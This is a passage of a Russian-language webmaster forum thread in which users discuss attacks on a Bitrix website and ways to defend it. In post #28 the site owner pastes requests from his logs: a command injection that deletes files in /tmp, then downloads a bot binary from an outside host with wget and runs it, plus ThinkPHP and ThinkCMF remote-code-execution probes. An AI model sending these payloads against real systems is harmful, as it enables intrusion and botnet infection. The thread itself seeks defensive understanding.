Что за атака и для чего?

1 234
R7
На сайте с 30.04.2008
Offline
264
#21

если в основном запросы на главную,

уберите с главной все картинки, баннеры, всю графику и видео,

и если возможно скрипты и прочее.

Страница будет легче, меньше будет нагружаться движок Битрикса.

У Битрикса CDN есть в штатных средствах - его активируйте.

suffix
На сайте с 26.08.2010
Offline
331
#22
Roman77:

У Битрикса CDN есть в штатных средствах - его активируйте.

Вы сами это делать пробовали ?

Это зло злостное !

Клуб любителей хрюш (https://www.babai.ru)
SeVlad
На сайте с 03.11.2008
Offline
1609
#23
Roman77:
уберите с главной все картинки, баннеры, всю графику и видео,
и если возможно скрипты и прочее.

Да чего там мелочиться - сайт снести нафик :)

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
R7
На сайте с 30.04.2008
Offline
264
#24
suffix:
Вы сами это делать пробовали ?

Это зло злостное !

Да, активировал тестил.

Убрал. Так как скорость не улучшилась, но для ддоса как доп элемент защиты норм

suffix
На сайте с 26.08.2010
Offline
331
#25
Roman77:

Убрал. Так как скорость не улучшилась

Вот именно !

athe
На сайте с 02.03.2020
Offline
16
#26
iSmel:
Нет, стоит лицензия битрикс, официальный шаблон, пара модулей, но все официально куплены в маркетплейсе... недоброжелателей хватает, некоторые даже пытались через консультант угрожать что на сайте они мне шелл поставили каким-то образом, но не верится особо..
Из непонятных параметров например: /?XDEBUG_SESSION_START=phpstorm
или вроде таких: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP

Вас парсят.

fliger
На сайте с 17.09.2015
Offline
114
#27
SeVlad:
достаточно читать даже сёрч, чтобы увидеть СКОЛЬКО людей сидят за ВПНами.

Некорректное сравнение. Разве здесь общаются домохозяйки, на коих (то есть обычных обывателей, не знающих, что такое VPN и Роскомнадзор) рассчитано подавляющее большинство сайтов?

I
На сайте с 22.10.2012
Offline
115
#28
athe:
Вас парсят.

Защититься от этого нельзя? IP каждый раз разные, страны тоже, явные левые прокси, многие в спам листах..

Просканировал сайт на вирусы и прочие уязвимости AI-BOLIT - ничего не найдено

Перенес с сайт на другой хостинг с защитой от Ddos, атаки спали, но время от времени поддалбливают новые запросы:

shell?cd+/tmp;rm+-rf+*;wget+http://cnc.hoaxcalls.pw/bins/jaws;chmod+777+jaws;/tmp/jaws

/solr/admin/info/system?wt=json

/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>

/?XDEBUG_SESSION_START=phpstorm

/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP

/dns-query?dns=AAABAAABAAAAAAAAAWE-

чего им надо? ))

И один вопрос из первого поста так и остался загадкой: почему при атаке оба счетчика яндекс и гугл весь трафик считают за внутренние переходы а не из поисковиков и прочее? Может в этом и есть смысл? Возможно это и в благих целях как-то можно...

Единственный хостинг, который предоставляет защиту от DDoS вплоть до L7, а не L3-L4 всего за 450 руб: https://adminvps.ru/vps/vps_russia.php?aff=17004
SerG757
На сайте с 07.02.2010
Offline
98
#29
iSmel:
И один вопрос из первого поста так и остался загадкой: почему при атаке оба счетчика яндекс и гугл весь трафик считают за внутренние переходы а не из поисковиков и прочее? Может в этом и есть смысл? Возможно это и в благих целях как-то можно...

Может на период атаки срабатывают редиректы? Например, пока исполняются запущенные скрипты, желаемая страница редиректит на какой-то другой адрес? Посмотрите на адреса, меняются или нет, и посмотрите вообще визуально в вебвизоре, что пользователи видят.

Оптимизатор - от слова ОПТИМИСТ. Как неизлечимый яндексоид, вам говорю...
SeVlad
На сайте с 03.11.2008
Offline
1609
#30
fliger:
Некорректное сравнение. Разве здесь общаются домохозяйки, на коих (то есть обычных обывателей, не знающих, что такое VPN и Роскомнадзор) рассчитано подавляющее большинство сайтов?

Во первых - если читать полностью, то я показывал где можно увидеть не только про сёрчеюзеров.

Во вторых - а что, сёрчеюзеры (и их друзья-родственники, на сек) - не юзеры? Они не ЦА сайтов?

В третьих.. ты сильно хорошо думаешь о недомохозяйствености многих сёрчеюзеров :)

1 234

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий